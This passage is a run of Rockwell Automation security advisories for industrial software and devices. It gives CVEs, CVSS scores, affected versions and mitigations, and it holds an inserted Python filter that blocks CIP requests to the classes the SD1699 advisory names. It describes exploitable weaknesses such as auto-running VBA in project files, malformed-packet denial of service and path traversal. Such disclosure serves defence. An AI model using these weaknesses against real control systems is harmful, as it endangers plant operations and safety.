CVE-2019-14855, CVE-2019-17543, CVE-2019-18276, CVE-2019-19244, CVE-2019-9893, CVE-2019-9923
CVSS Scores (v3.1):
7.5, 8.1, 7.8, 7.5, 9.8, 7.5
CVSS Scores (v4.0):
9.3, 8.7, 9.3, 8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 10/8/24

Revision Number: 1.0

CVSS Score: v3.1: 7.5, 8.1, 7.8, 9.8; v4.0: 8.7, 9.3

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud | <=7.07 | v7.09

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities.

CVE-2019-14855 IMPACT

The affected product uses GnuPG, which in affected versions still accepts certificate signatures made with SHA-1, an algorithm for which collision attacks are practical. A threat actor could use this weakness to create forged certificate signatures. If exploited, a malicious user could view customer data.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-17543 IMPACT

The affected product uses LZ4, which before 1.9.2 contains a heap-based buffer overflow (related to LZ4_compress_destSize) that affects applications calling LZ4_compress_fast with a large input. The issue can also lead to data corruption. Note that the LZ4 maintainers state that "only a few specific / uncommon usages of the API are at risk." If exploited, a malicious actor could achieve remote code execution.

CVSS 3.1 Base Score: 8.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-18276 IMPACT

The affected product uses GNU Bash, which through 5.0 patch 11 contains a vulnerability in disable_priv_mode in shell.c. A threat actor who can already execute commands in the shell can use "enable -f" to load a shared object at runtime and gain privileges that should have been dropped. If exploited, a malicious actor could escalate privileges on the host; the vector below reflects that this is a local attack requiring an existing low-privilege shell.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-19244 IMPACT

The affected product uses SQLite 3.30.1, which contains a vulnerability in sqlite3Select in select.c that allows a crash if a subselect uses both DISTINCT and window functions and has certain ORDER BY usage. If exploited, a malicious actor could cause a denial of service; the user would need to restart the software to recover.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-9893 IMPACT

The affected product uses libseccomp, which in versions 2.4.0 and earlier does not correctly generate 64-bit syscall argument comparisons for the arithmetic operators (LT, GT, LE, GE). This allows seccomp filters to be bypassed and could lead to privilege escalation. If exploited, a malicious actor could achieve remote code execution.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-9923 IMPACT

The affected product uses GNU Tar, which before 1.32 has a NULL pointer dereference in pax_decode_header in sparse.c when parsing certain archives with malformed extended headers. If exploited, a malicious actor could cause a denial of service; the user would need to restart the software to recover.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to the corrected version (v7.09) listed above.

  • For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • CVE-2019-14855 JSON
  • CVE-2019-17543 JSON
  • CVE-2019-18276 JSON
  • CVE-2019-19244 JSON
  • CVE-2019-9893 JSON
  • CVE-2019-9923 JSON


High
SD1702 | Sensitive Data Exposure and Escalating Privileges Vulnerabilities in DataMosaix™ Private Cloud
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
CVE-2024-7952, CVE-2024-7953, CVE-2024-7956
CVSS Scores (v3.1):
7.5, 8.8, 8.1
CVSS Scores (v4.0):
8.7, 8.7, 7.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 10/8/24
Revision Number: 1.0
CVSS Score: v3.1: 7.5, 8.8, 8.1; v4.0: 8.7, 8.7, 7.6

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud | <=7.07 | v7.09

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7952 IMPACT

A data exposure vulnerability exists in the affected product. Hard-coded links in the source code point to JSON files that can be retrieved without authentication. If exploited, a threat actor could view customer data.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

CVE-2024-7953 IMPACT

A vulnerability exists in the affected products that allows a threat actor with an account to create a project and become its administrator. If exploited, the threat actor could create, modify, and delete their own project.

CVSS 3.1 Base Score: 8.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-862: Missing Authorization
Known Exploited Vulnerability (KEV) database: No

CVE-2024-7956 IMPACT

A vulnerability exists in the affected products that allows a threat actor to gain access to other users' projects. To exploit this vulnerability, the threat actor must have basic user privileges. If exploited, the threat actor can modify and delete the project.

CVSS 3.1 Base Score: 8.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 7.6
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE-863: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

  • Security Best Practices 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • CVE-2024-7952 JSON
  • CVE-2024-7953 JSON
  • CVE-2024-7956 JSON
High
SD1701 | RSLogix™ 5 and RSLogix 500® Remote Code Execution Via VBA Embedded Script
Published Date:
September 16, 2024
Last Updated:
October 14, 2024
CVE IDs:
CVE-2024-7847
CVSS Scores (v3.1):
7.7
CVSS Scores (v4.0):
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Published Date: September 19, 2024
Last Updated: September 19, 2024
Revision Number: 1.0
CVSS Score: v3.1: 7.7/10, v4.0: 8.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Version | Corrected in Software Version
RSLogix 500® | All | n/a
RSLogix™ Micro Developer and Starter | All | n/a
RSLogix™ 5 | All | n/a


Mitigations and Workarounds

No corrected version is available. Customers using the affected software are encouraged to apply the following mitigations and security best practices, where possible.

  • Deny the execution feature in FactoryTalk® Administration Console when it is not needed: navigate to "Policies", select "Enable/Disable VBA", and check the "Deny"box to block VBA code execution.

  • Save project files in a trusted location that only administrators can modify, and verify file integrity before opening them.

  • Use the VBA editor protection feature, which locks the VBA code against viewing and editing by setting a password. This protects the code in your own projects; it does not stop a script embedded in a project file from elsewhere from running.

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerability, which was reported to us by Sharon Brizinov of Claroty Research - Team82.

CVE-2024-7847 IMPACT

A feature in the affected products lets a user prepare a project file with an embedded VBA script that is configured to run as soon as the project file is opened, without further user intervention. This feature can be abused to trick a legitimate user into executing malicious code by opening a malicious RSP/RSS project file. If exploited, a threat actor may be able to achieve remote code execution on the engineering workstation, and connected devices may also be impacted.

CVSS 3.1 Base Score: 7.7
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.8
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE-345: Insufficient Verification of Data Authenticity

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

  • JSON CVE-2024-7847
High
SD1699 | 5015-U8IHFT Denial-of-Service Vulnerability via CIP Message
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2024-45825
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
5015-U8IHFT | V1.011 and V1.012 | V2.011

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45825 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability occurs when a malformed CIP packet is sent over the network to the device and results in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Block communication to CIP class 883 (0x373) if it is not required.

  • Block communication to CIP class 67 (0x43) if it is not required.

  • Enforce proper network segmentation and routing controls.

  • For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.
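An added example, not Rockwell's code or tooling: the class-blocking mitigations above, and the malformed-CIP denial-of-service conditions this advisory and SD1707 describe, both come down to looking inside EtherNet/IP frames on TCP 44818. The block below decodes the encapsulation header, the Common Packet Format items of a SendRRData or SendUnitData command, and the CIP Message Router request they carry, far enough to recover the class, instance and attribute a request targets, so requests to classes 883 (0x373) and 67 (0x43) can be dropped or alerted on from a network monitor or an inline filter. `build_send_rr_data` exists only to construct sample traffic for the demonstration; its bytes are not a capture from an affected device, and the session handle and class/instance values are made up. Frames that do not decode are treated as blocked rather than forwarded, since undecodable CIP is exactly what these advisories warn about.

```python
import struct

# EtherNet/IP encapsulation commands and Common Packet Format (CPF) item types (ODVA values).
ENIP_HEADER_LEN = 24
ENIP_SEND_RR_DATA = 0x006F
ENIP_SEND_UNIT_DATA = 0x0070
CPF_NULL_ADDRESS = 0x0000
CPF_CONNECTED_DATA = 0x00B1
CPF_UNCONNECTED_DATA = 0x00B2

# Classes named in the SD1699 mitigations; the advisory gives them in decimal (883 = 0x373, 67 = 0x43).
DENIED_CLASSES = {883, 67}

# CIP logical segment byte: bits 7-5 = 001, bits 4-2 = logical type, bits 1-0 = value format.
LOGICAL_TYPES = {0x00: "class", 0x04: "instance", 0x08: "member",
                 0x0C: "connection_point", 0x10: "attribute"}
# value format -> (total segment width in bytes, offset of the value within the segment, struct format)
LOGICAL_FORMATS = {0: (2, 1, "<B"), 1: (4, 2, "<H"), 2: (6, 2, "<I")}


def parse_epath(path: bytes) -> dict:
    """Decode the logical segments of a CIP request path into {'class': .., 'instance': .., ...}."""
    out, i = {}, 0
    while i < len(path):
        seg = path[i]
        name = LOGICAL_TYPES.get(seg & 0x1C)
        fmt = LOGICAL_FORMATS.get(seg & 0x03)
        if (seg & 0xE0) != 0x20 or name is None or fmt is None:
            raise ValueError(f"unsupported path segment 0x{seg:02x} at offset {i}")
        width, value_off, unpack = fmt
        if i + width > len(path):
            raise ValueError("truncated logical segment")
        out[name] = struct.unpack_from(unpack, path, i + value_off)[0]
        i += width
    return out


def parse_message_router_request(data: bytes) -> dict:
    """Service code, decoded request path and trailing request data of a CIP Message Router request."""
    if len(data) < 2:
        raise ValueError("truncated Message Router request")
    service, path_words = data[0], data[1]
    path_end = 2 + 2 * path_words
    if path_end > len(data):
        raise ValueError("request path size exceeds packet")
    return {"service": service, "path": parse_epath(data[2:path_end]), "data": data[path_end:]}


def extract_cip_request(frame: bytes):
    """Return the CIP request carried by a SendRRData/SendUnitData frame, or None for other commands."""
    if len(frame) < ENIP_HEADER_LEN:
        raise ValueError("truncated encapsulation header")
    command, length = struct.unpack_from("<HH", frame, 0)
    if command not in (ENIP_SEND_RR_DATA, ENIP_SEND_UNIT_DATA):
        return None
    payload = frame[ENIP_HEADER_LEN:ENIP_HEADER_LEN + length]
    if len(payload) != length or length < 8:
        raise ValueError("encapsulation length does not match the frame")
    # Interface handle (4 bytes) and timeout (2 bytes) precede the CPF item count.
    (item_count,) = struct.unpack_from("<H", payload, 6)
    offset = 8
    for _ in range(item_count):
        if offset + 4 > len(payload):
            raise ValueError("truncated CPF item header")
        type_id, item_len = struct.unpack_from("<HH", payload, offset)
        offset += 4
        item = payload[offset:offset + item_len]
        if len(item) != item_len:
            raise ValueError("CPF item length exceeds payload")
        offset += item_len
        if type_id == CPF_UNCONNECTED_DATA:
            return parse_message_router_request(item)
        if type_id == CPF_CONNECTED_DATA:      # connected data carries a 16-bit sequence count first
            return parse_message_router_request(item[2:])
    return None


def should_block(frame: bytes) -> bool:
    """Policy: block requests to denied classes, and block anything that does not decode (fail closed)."""
    try:
        request = extract_cip_request(frame)
    except ValueError:
        return True
    if request is None:
        return False
    return request["path"].get("class") in DENIED_CLASSES


def build_send_rr_data(service: int, class_id: int, instance_id: int, attribute=None,
                       session: int = 0x11223344) -> bytes:
    """Constructed sample traffic (not a capture): SendRRData with a Null Address item and an Unconnected Data item."""
    path = b""
    for logical, value in ((0x20, class_id), (0x24, instance_id)):
        if value <= 0xFF:
            path += bytes([logical, value])                               # 8-bit logical segment
        else:
            path += bytes([logical | 1, 0]) + struct.pack("<H", value)    # 16-bit: pad byte, then LE value
    if attribute is not None:
        path += bytes([0x30, attribute])
    request = bytes([service, len(path) // 2]) + path
    cpf = struct.pack("<H", 2) + struct.pack("<HH", CPF_NULL_ADDRESS, 0)
    cpf += struct.pack("<HH", CPF_UNCONNECTED_DATA, len(request)) + request
    body = struct.pack("<IH", 0, 0) + cpf       # interface handle 0 (CIP), timeout 0
    header = struct.pack("<HHII8sI", ENIP_SEND_RR_DATA, len(body), session, 0, b"\x00" * 8, 0)
    return header + body


if __name__ == "__main__":
    for label, frame in (("Identity Get_Attribute_Single", build_send_rr_data(0x0E, 0x01, 1, 1)),
                         ("class 883", build_send_rr_data(0x0E, 883, 1)),
                         ("class 67", build_send_rr_data(0x0E, 67, 1))):
        print(f"{label}: block={should_block(frame)} request={extract_cip_request(frame)}")
```

Two caveats for anyone turning this into a production filter: connected (Class 3 and Class 1) traffic identifies its target at Forward_Open time and later carries only a connection ID, so a request-path check on SendUnitData sees whatever path the connected request embeds, not necessarily the object the connection was opened against; and the deny-list is a mitigation for one advisory, not a substitute for the segmentation the advisory also asks for.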

ADDITIONAL RESOURCES

·         JSON CVE-2024-45825

Critical
SD1698 | FactoryTalk® Batch View™ Authentication Bypass Vulnerability via shared secrets
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2024-45823
CVSS Scores (v3.1):
8.1
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 8.1/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
FactoryTalk® Batch View™ | 2.01.00 | 3.00.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45823 IMPACT

An authentication bypass vulnerability exists in the affected product. The vulnerability exists due to shared secrets across accounts and could allow a threat actor to impersonate a user if the threat actor is able to enumerate additional information required during authentication.

CVSS 3.1 Base Score: 8.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-287: Improper Authentication
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to the corrected version (3.00.00) listed above.

  • For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2024-45823

High
SD1700 | ThinManager® Code Execution Vulnerability
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2024-45826
CVSS Scores (v3.1):
6.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 6.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
ThinManager® | V13.1.0 - 13.1.2 | V13.1.3
ThinManager® | V13.2.0 - 13.2.1 | V13.2.2

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45826 IMPACT

Due to improper input validation, a path traversal and remote code execution vulnerability exists when ThinManager® processes a crafted POST request. If exploited, a threat actor could install and run an executable file on the ThinManager® server; the vector below reflects that high privileges and user interaction are required.

CVSS 3.1 Base Score: 6.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-610: Externally Controlled Reference to a Resource in Another Sphere
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to one of the corrected versions listed above.

  • For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2024-45826

High
SD1697 | AADvance® Trusted® SIS Workstation contains multiple 7-ZIP Vulnerabilities
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2023-31102, CVE-2023-40481
CVSS Scores (v3.1):
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.8/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
AADvance® Trusted® SIS Workstation | 2.00.01 and earlier | 2.00.02

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-31102 IMPACT

A vulnerability exists that could allow remote threat actors to execute arbitrary code on affected installations of 7-Zip. User interaction is required: the target must visit a malicious page or open a malicious file.

The specific flaw exists in the parsing of 7Z archives. Missing validation of user-supplied data can lead to an integer underflow before a write to memory. A threat actor can exploit this vulnerability to execute code in the context of the current process.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

CVE-2023-40481 IMPACT

A SquashFS file parsing out-of-bounds write vulnerability exists in 7-Zip that could allow remote threat actors to execute arbitrary code on affected installations. User interaction is again required: the target must visit a malicious page or open a malicious file.

The specific flaw exists in the parsing of SQFS files. Missing validation of user-supplied data can cause a write past the end of an allocated buffer. A threat actor can exploit this vulnerability to execute code in the context of the current process.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to the corrected version (2.00.02) listed above.

  • Do not archive or restore projects from unknown sources.

  • For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2023-31102

·         JSON CVE-2023-40481

Critical
SD1696 | FactoryTalk® View Site Edition Remote Code Execution Vulnerability via Lack of Input Validation
Published Date:
September 12, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-45824
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
FactoryTalk® View Site Edition | V12.0, V13.0, V14.0 | Patches available here

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45824 IMPACT

A remote code execution vulnerability exists in the affected products. When chained with path traversal, command injection, and XSS vulnerabilities, it allows full unauthenticated remote code execution. The link in the mitigations section below contains patches to fix this issue.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-77: Improper Neutralization of Special Elements used in a Command
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Navigate to the following link and apply the patches; directions are provided on the linked page.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2024-45824

High
SD1695 | Incorrect Privileges and Path Traversal Vulnerability in Pavilion8®
Published Date:
September 11, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-7960 , CVE-2024-7961
CVSS Scores (v3.1):
7.6, 7.2
CVSS Scores (v4.0):
8.8, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/24
Revision Number: 1.0
CVSS Score: v3.1: 7.6, 7.2; v4.0: 8.8, 8.6

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments. 

AFFECTED PRODUCTS AND SOLUTION 

Affected Product  Affected Software Version  Corrected in Software Version 
Pavilion8®            <V5.20  V6.0 and later  

 

VULNERABILITY DETAILS 

Rockwell Automation used the latest versions of the CVSS scoring system to assess the vulnerabilities. 

CVE-2024-7960 IMPACT 

The affected product contains a vulnerability that allows a threat actor to view sensitive information and change settings. The vulnerability exists due to having an incorrect privilege matrix that allows users to have access to functions they should not.  

CVSS 3.1 Base Score: 7.6 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L 

CVSS 4.0 Base Score: 8.8 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N 

CWE:  CWE-269: Improper Privilege Management
Known Exploited Vulnerability (KEV) database: No 

CVE-2024-7961 IMPACT 

A path traversal vulnerability exists in the affected product. If exploited, the threat actor could upload arbitrary files to the server, which could result in remote code execution.

CVSS 3.1 Base Score: 7.2 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 

CVSS 4.0 Base Score: 8.6 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 

CWE:  CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Known Exploited Vulnerability (KEV) database: No 

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

  • Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 

ADDITIONAL RESOURCES 

  • CVE-2024-7960 JSON

  • CVE-2024-7961 JSON

High
SD1694 | OptixPanel™ Privilege Escalation Vulnerability via File Permissions
Published Date:
September 10, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-8533
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
7.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 7.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product               First Known in Software Version   Corrected in Software Version
2800C OptixPanel™ Compact      4.0.0.325                         4.0.2.116
2800S OptixPanel™ Standard     4.0.0.350                         4.0.2.123
Embedded Edge Compute Module   4.0.0.347                         4.0.2.106

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-8533 IMPACT

A privilege escalation vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing users to exfiltrate credentials and escalate privileges.

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-269: Improper Privilege Management 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
